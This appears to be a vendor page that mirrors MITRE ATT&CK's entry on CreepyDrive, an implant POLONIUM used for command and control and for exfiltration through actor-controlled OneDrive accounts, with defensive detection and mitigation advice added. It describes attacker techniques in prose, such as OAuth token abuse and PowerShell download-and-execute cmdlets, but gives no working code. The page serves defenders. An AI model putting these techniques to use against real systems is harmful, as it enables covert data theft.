Live Active security incident? Get immediate response
MITRE ATT&CK® Malware

S1023: CreepyDrive

CreepyDrive is a custom implant has been used by POLONIUM since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.[1]

POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[1]

EnterpriseS1023MalwareObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

CreepyDrive matters because it shows how an implant can blend command-and-control and data theft into normal-looking cloud activity, specifically actor-controlled OneDrive accounts, with a similar Dropbox-based implant noted by MITRE. For leaders, the key issue is not the malware name alone; it is whether the organization can distinguish legitimate Office Suite/cloud storage use from unauthorized C2, file discovery, token misuse, tool transfer, and exfiltration from Windows and Office Suite environments.

Executive priority

Prioritize validation of cloud storage governance, identity token controls, and SOC visibility for OneDrive/Office Suite activity. This behavior is material to business continuity and incident decision-making because exfiltration to common cloud services can bypass controls that only focus on unusual destinations. Risk owners should ask whether cloud access logs, endpoint PowerShell telemetry, file access evidence, and data movement records are retained well enough to support investigation, audit evidence, and rapid containment.

Technical view

MITRE does not provide object-specific detection text for CreepyDrive, so defenders should validate coverage through the related ATT&CK behaviors: PowerShell execution, file and directory discovery, data collection from local systems, web-protocol C2, bidirectional communication through web services, ingress tool transfer, application access token use, and exfiltration to cloud storage. SOC and IR teams should focus on Windows endpoint activity and Office Suite/cloud telemetry involving OneDrive, while considering the related note that a similar implant, CreepyBox, used actor-controlled Dropbox accounts.

Likely telemetry

  • Windows process creation and command-line telemetry, especially PowerShell activity
  • PowerShell script block, module, and operational logs where enabled
  • Endpoint file system access, file enumeration, and staging indicators
  • Network proxy, DNS, TLS, and web gateway logs for cloud storage and web protocol traffic
  • Office Suite and OneDrive audit logs, including file upload/download and sharing activity

Detection direction

  • Baseline legitimate OneDrive and Office Suite usage before alerting on volume alone; business processes can generate high cloud storage traffic.
  • Correlate PowerShell execution with file discovery, local data access, cloud storage communication, and unusual upload behavior rather than relying on a single indicator.
  • Review for suspicious application access token activity, including unexpected token use against Office Suite resources, because ATT&CK links the object to application access token abuse.
  • Tune detections for web-service-based bidirectional communication where endpoints repeatedly poll or exchange data with cloud services in patterns inconsistent with normal user behavior.
  • Include Dropbox-related monitoring where permitted, because MITRE notes a similar implant called CreepyBox relied on actor-controlled Dropbox accounts.

Mitigation priorities

  • Ensure Office Suite and cloud storage audit logging is enabled and retained for investigations.
  • Harden identity controls around application access tokens, including review of token grants, service principals, consent workflows, and anomalous SaaS access.
  • Restrict or govern cloud storage use based on business need, with monitoring for uploads to unapproved or unusual accounts where feasible.
  • Improve endpoint controls for PowerShell visibility and policy enforcement on Windows systems.
  • Use data protection controls to identify and alert on sensitive data movement to cloud storage services.
Analyst notes and limits

The supplied ATT&CK object identifies CreepyDrive as a custom implant used by POLONIUM since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts. Relationship context links the malware to collection, discovery, execution, C2, token abuse, tool transfer, and cloud exfiltration techniques. The group relationship notes POLONIUM’s reported targeting history, but this take does not infer current targeting or exposure for any specific organization.

MITRE provides no official detection guidance for this malware object, no explicit tactics on the object itself, and no aliases or labels. Coverage decisions require local evidence from endpoint, identity, Office Suite, SaaS, and network telemetry. Platform statements are limited to the supplied Windows and Office Suite fields plus related technique context.

Official MITRE ATT&CK definition

CreepyDrive

CreepyDrive is a custom implant has been used by POLONIUM since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.[1]

POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

8 rows
Domain ID Name Relationship / procedure
Enterprise T1071.001 Web Protocols Sub-technique

CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.CitationMicrosoft POLONIUM June 2022
Enterprise T1567.002 Exfiltration to Cloud Storage Sub-technique

CreepyDrive can use cloud services including OneDrive for data exfiltration.CitationMicrosoft POLONIUM June 2022
Enterprise T1102.002 Bidirectional Communication Sub-technique

CreepyDrive can use OneDrive for C2.CitationMicrosoft POLONIUM June 2022
Enterprise T1550.001 Application Access Token Sub-technique

CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.CitationMicrosoft POLONIUM June 2022
Enterprise T1083 File and Directory Discovery

CreepyDrive can specify the local file path to upload files from.CitationMicrosoft POLONIUM June 2022
Enterprise T1105 Ingress Tool Transfer

CreepyDrive can download files to the compromised host.CitationMicrosoft POLONIUM June 2022
Enterprise T1059.001 PowerShell Sub-technique

CreepyDrive can use Powershell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.CitationMicrosoft POLONIUM June 2022
Enterprise T1005 Data from Local System

CreepyDrive can upload files to C2 from victim machines.CitationMicrosoft POLONIUM June 2022
Associated objects

Groups, software, and campaigns

Group Enterprise

G1005: POLONIUM

POLONIUM is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess POLONIUM has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.[1]

Relationship explorer

All related ATT&CK context

uses · Group G1005: POLONIUM Enterprise uses · Technique T1071.001: Web Protocols Enterprise uses · Technique T1567.002: Exfiltration to Cloud Storage Enterprise uses · Technique T1102.002: Bidirectional Communication Enterprise uses · Technique T1550.001: Application Access Token Enterprise uses · Technique T1083: File and Directory Discovery Enterprise uses · Technique T1105: Ingress Tool Transfer Enterprise uses · Technique T1059.001: PowerShell Enterprise uses · Technique T1005: Data from Local System Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
3524d0c407d6a9c5...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 3524d0c407d6…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Microsoft POLONIUM June 2022

    Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.

    Open source URL
  2. [2]
    mitre-attack S1023
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use